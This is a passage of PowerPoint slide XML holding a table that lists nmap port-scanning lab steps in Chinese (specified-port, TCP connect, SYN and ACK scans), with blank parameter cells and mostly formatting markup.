                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目节点</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>节点参数</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc rowSpan="7">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>nmap端口扫描</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="1">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1.指定端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2.TCP协议全连接的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>3.TCP SYN协议的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>4.TCP ACK协议的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
